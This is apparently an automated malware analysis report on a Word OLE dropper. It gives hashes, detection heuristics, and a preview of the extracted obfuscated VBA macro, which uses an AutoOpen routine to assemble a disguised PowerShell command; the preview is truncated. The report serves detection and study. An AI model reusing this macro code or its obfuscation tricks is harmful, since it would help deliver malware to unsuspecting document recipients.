Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ee00b28ec3e9ba21…

MALICIOUS

Office (OLE)

245.2 KB Created: 2018-07-06 23:20:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: ad015b485c6ef612c8dbbd1112f9317a SHA-1: d8522fc5da9f974ffe0968a7c5d0e6f9ff1d4c2d SHA-256: ee00b28ec3e9ba212fc6c85b2d2bb97ea16faf5bf212e5ae61d1173de1f07403
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains heavily obfuscated VBA macros, including an AutoOpen macro, which is a common loader for malicious documents. The script utilizes `CreateObject` and `Shell()` calls, indicative of payload execution. Specifically, the VBA script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6603269-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6603269-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16824 bytes
SHA-256: 769fea5ef1adac3fe0d87f01df06952533a5d26eebe1447bd10fc351f1164b0a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RoRObvBKJjqLPh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   sLJWi = zPfia / BPQiVt * BomiHQ - uTPNI + 4809 - EMmYzi / 75022 - EQBKp
   jFMPbH = alOQUi / EXEaF * BOEmvR - phdBTs + 87716 - azVikq / 79191 - kbTKs
   frVOU = QpCvR / hOrCh * wdsBR - NEwhT + 18729 - QTvfk / 73065 - WfOisO
   zhYiiV = ZUJYI / IMwbod * YjrVnM - TKcHr + 82610 - iUvKPQ / 49301 - BYLiw
   fIzXv = GcBFa / dzRVX * wDdJY - DjkWh + 93808 - dnFjEJ / 58855 - lGKWrE
   EwfmVi = kWklT / ikuFi * jYPMMt - KzTmjJ + 77120 - jXCJFw / 69109 - NUXKS
jqBfzPbjwfUXfn (OhwctIkkaRz + izoCt + IruUzWcjI)
   RNHjQ = lStjTF / jDbfS * MsvZw - ECsoiW + 15710 - DVTBId / 83101 - jQYfdC
   rGEOT = pOhWHK / iOrmqK * NSkHn - NhQDh + 91809 - GjBal / 98980 - MKtWw
   wizAJ = WnJjM / tdLJLi * OjZXp - aIiAT + 42220 - YasDW / 15539 - jwjsc
End Sub


Attribute VB_Name = "iRGtCRGrY"
Function OhwctIkkaRz()
On Error Resume Next
zinRM = 87847 / sDADDj * 53406 - 51557 / 17361 * zJBUBp / KVrXmR - wMniB - (zzifw / 30683 / JCAsIj + qEjrv - (uHqCWF + sErwwZ))
   auGjka = 70890 / RKIwM * 362 - 34655 / 35399 * tXcCGW / iUknG - pNNdB - (pzkzuY / 6074 / wrhwn + CTvIj - (XjzPq + IEVulj))
   dbJaid = 7050 / YqnmA * 91562 - 19344 / 42291 * EuhRF / UGzQw - DGwzKh - (JVaGPF / 22395 / cDzMu + cjpQLX - (pTlNF + UjpmpN))
CBcsRZ = "wershell" + "         " + "       " + "   &" + Chr(40) + Chr(40) + "geT-" + "vARiA" + "BLe '" + "*MDr*'" + Chr(41) + "." + "NAme[3,1" + "1,2]-JOi" + "n''" + Chr(41) + Chr(40) + "-" + "JOIn"
iViSj = 88819 / lCtrt * 44740 - 42623 / 37897 * jsAFY / VdjMFj - ATrsrs - (sMQsCP / 42597 / SNWrH + nizilp - (EiToio + azAjd))
   njAwdz = 8065 / jSHOZk * 31185 - 74289 / 27938 * tIWJmN / daniZY - odOpna - (OmoqG / 36926 / sXtrj + XUaiw - (UAYQKG + NavWaz))
   fWXlEj = 16144 / wOGNR * 89992 - 60990 / 90969 * MGrIbI / dsFLEv - YUqYKU - (kLzWD / 14395 / YaJLAN + BsqEN - (IMizQC + htaWVb))
   usmXBs = 9922 / vzDiW * 44695 - 54203 / 611 * woBYh / FAbRf - npZnlG - (DjMnCu / 66288 / MUJKQa + ZnYCN - (hWZaZR + KdvkQ))
DPsKEB = Chr(40) + Chr(40) + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64"
jrNMZB = 6378 / UQwOn * 3336 - 25988 / 10801 * fPibhQ / YXQiub - RRjckq - (IhHpa / 94364 / nKabsL + CMPCbn - (BkZNsl + zEZcOs))
   cHDJT = 96964 / WpNcE * 26240 - 71373 / 85333 * FDwod / DTaUzS - qOlhP - (rfcWB / 86740 / iaFko + HraaWW - (fEjizB + JwzqWw))
   dchzv = 32270 / dNqfI * 21965 - 42008 / 30648 * PKVanv / WAADfa - NqJGN - (sYbdNa / 42871 / TsjniM + LcENhi - (zuNmC + cpwEIR))
pJqNmAwjsps = " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12"
lHTjlN = 79972 / BQBOE * 38529 - 50825 / 17291 * NGzhc / LKpGBz - TFVliu - (DCovX / 21998 / jRtkwT + iQktJ - (HZwGo + XwwsT))
   AALRBK = 32900 / ctwWC * 60656 - 35976 / 79349 * lrUVBi / hHUnf - YZuTTL - (ziisT / 60011 / zklXFH + HbVJw - (Fkuqd + pUWcjM))
plnuUI = "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , "
mikfwC = 92423 / NqCCb * 31934 - 29298 / 39444 * DSBSs / jpPPOC - wcdbmv - (YwjwS / 91565 / HaIAvN + RLjbuF - (phmhJ + uaZAdT))
   DJcCWw = 12285 / VwiYfR * 96085 - 47994 / 18242 * pNPnr / sqKcI - LzkSD - (sHcXz / 74280 / tuBJD + DZrSI - (PROJjo + pTllnN))
   jCsROc = 27752 / TrjHEE * 53886 - 38560 / 59145 * roBizw / VzFIJO - qtWXzA - (zBTuSz / 63513 / krRGL + ZiCEv - (sfJpKc + RKhEUd))
ZmZdQ = "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , "
jbiMAj = 89216 / FTlVi * 71345 - 54317 / 11027 * dnUzZ / faIBo - RiJPGU - (NzfEc / 93537 / iiYAO + lzktY - (JWzmsh + YopcF))
   mEzwi = 54515 / HPTpC * 59440 - 32947 / 93090 * sqRjRu / JVEhA - WcKqN - (cbzbY / 50677 / WNTXPJ + AlckLm - (oqaZvP + triMRr))
   uPtIr = 44980 / pwpXX * 16268 - 70440 / 98422 * iahnkW / cLbdW - KzRJbr - (qCvUn / 2834 / kXsqIs + irKjo - (NRzPt + znrGNh))
MEBJhYpP = "93 ,93 ,4" + " ,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.